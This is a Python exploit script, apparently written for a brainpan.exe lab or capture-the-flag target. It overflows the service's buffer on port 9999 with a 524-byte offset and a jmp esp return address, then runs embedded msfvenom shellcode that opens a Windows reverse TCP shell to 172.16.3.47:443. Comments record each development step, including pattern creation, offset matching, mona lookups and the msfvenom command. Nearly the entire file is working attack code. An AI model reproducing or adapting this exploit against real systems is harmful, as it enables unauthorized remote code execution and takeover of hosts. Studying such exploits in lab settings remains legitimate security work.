import socket import sys from time import sleep # cp 2-crash.py 3-pattern.py # updatedb # locate pattern_create.rb # /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 650 pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av' badchars = ( "" ) shellcode = ( "\xda\xd2\xd9\x74\x24\xf4\x58\xba\xfa\x27\xd1\x5d\x31\xc9\xb1" "\x52\x31\x50\x17\x03\x50\x17\x83\x3a\x23\x33\xa8\x46\xc4\x31" "\x53\xb6\x15\x56\xdd\x53\x24\x56\xb9\x10\x17\x66\xc9\x74\x94" "\x0d\x9f\x6c\x2f\x63\x08\x83\x98\xce\x6e\xaa\x19\x62\x52\xad" "\x99\x79\x87\x0d\xa3\xb1\xda\x4c\xe4\xac\x17\x1c\xbd\xbb\x8a" "\xb0\xca\xf6\x16\x3b\x80\x17\x1f\xd8\x51\x19\x0e\x4f\xe9\x40" "\x90\x6e\x3e\xf9\x99\x68\x23\xc4\x50\x03\x97\xb2\x62\xc5\xe9" "\x3b\xc8\x28\xc6\xc9\x10\x6d\xe1\x31\x67\x87\x11\xcf\x70\x5c" "\x6b\x0b\xf4\x46\xcb\xd8\xae\xa2\xed\x0d\x28\x21\xe1\xfa\x3e" "\x6d\xe6\xfd\x93\x06\x12\x75\x12\xc8\x92\xcd\x31\xcc\xff\x96" "\x58\x55\x5a\x78\x64\x85\x05\x25\xc0\xce\xa8\x32\x79\x8d\xa4" "\xf7\xb0\x2d\x35\x90\xc3\x5e\x07\x3f\x78\xc8\x2b\xc8\xa6\x0f" "\x4b\xe3\x1f\x9f\xb2\x0c\x60\xb6\x70\x58\x30\xa0\x51\xe1\xdb" "\x30\x5d\x34\x4b\x60\xf1\xe7\x2c\xd0\xb1\x57\xc5\x3a\x3e\x87" "\xf5\x45\x94\xa0\x9c\xbc\x7f\x63\x70\xbd\x50\x13\x73\xc1\xaf" "\x58\xfa\x27\xc5\x8e\xab\xf0\x72\x36\xf6\x8a\xe3\xb7\x2c\xf7" "\x24\x33\xc3\x08\xea\xb4\xae\x1a\x9b\x34\xe5\x40\x0a\x4a\xd3" "\xec\xd0\xd9\xb8\xec\x9f\xc1\x16\xbb\xc8\x34\x6f\x29\xe5\x6f" "\xd9\x4f\xf4\xf6\x22\xcb\x23\xcb\xad\xd2\xa6\x77\x8a\xc4\x7e" "\x77\x96\xb0\x2e\x2e\x40\x6e\x89\x98\x22\xd8\x43\x76\xed\x8c" "\x12\xb4\x2e\xca\x1a\x91\xd8\x32\xaa\x4c\x9d\x4d\x03\x19\x29" "\x36\x79\xb9\xd6\xed\x39\xd9\x34\x27\x34\x72\xe1\xa2\xf5\x1f" "\x12\x19\x39\x26\x91\xab\xc2\xdd\x89\xde\xc7\x9a\x0d\x33\xba" "\xb3\xfb\x33\x69\xb3\x29" ) # cp 3-pattern.py 4-control-eip.py # locate pattern_offset.rb # /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 650 -q 35724134 # [*] Exact match at offset 524 # buffer = 'A' * 600 # buffer = pattern # buffer = 'A' * 524 + 'B' * 4 + 'C' * 122 # 524 + 4 + 122 = 650 # buffer = 'A' * 524 + 'B' * 4 + 'C' * 522 # 122 + 400 = 522 # buffer = 'A' * 524 + 'B' * 4 + badchars # bad characters \x00 # locate nasm_shell.rb # /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb # nasm > jmp esp # 00000000 FFE4 jmp esp # nasm > # !mona modules # !mona find -s "\xff\xe4" -m brainpan.exe # jmp esp at address 311712F3 # buffer = 'A' * 524 + '\xF3\x12\x17\x31' + 'C' * 522 # jmp esp noted in little endian # msfvenom -p windows/shell_reverse_tcp LHOST=172.16.3.47 LPORT=443 EXITFUNC=thread -a x86 --platform windows -b "\x00" -f c > shellcode.txt buffer = 'A' * 524 + '\xF3\x12\x17\x31' + '\x90' * 32 + shellcode + 'C' * 139 # 522 - 32 - 351 try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.settimeout(2) s.connect(('172.16.3.19',9999)) s.recv(1024) print '[*] Sending buffer.' s.send(buffer + '\r\n') s.close() except: print '[*] Could not connect to target, exiting.' sys.exit()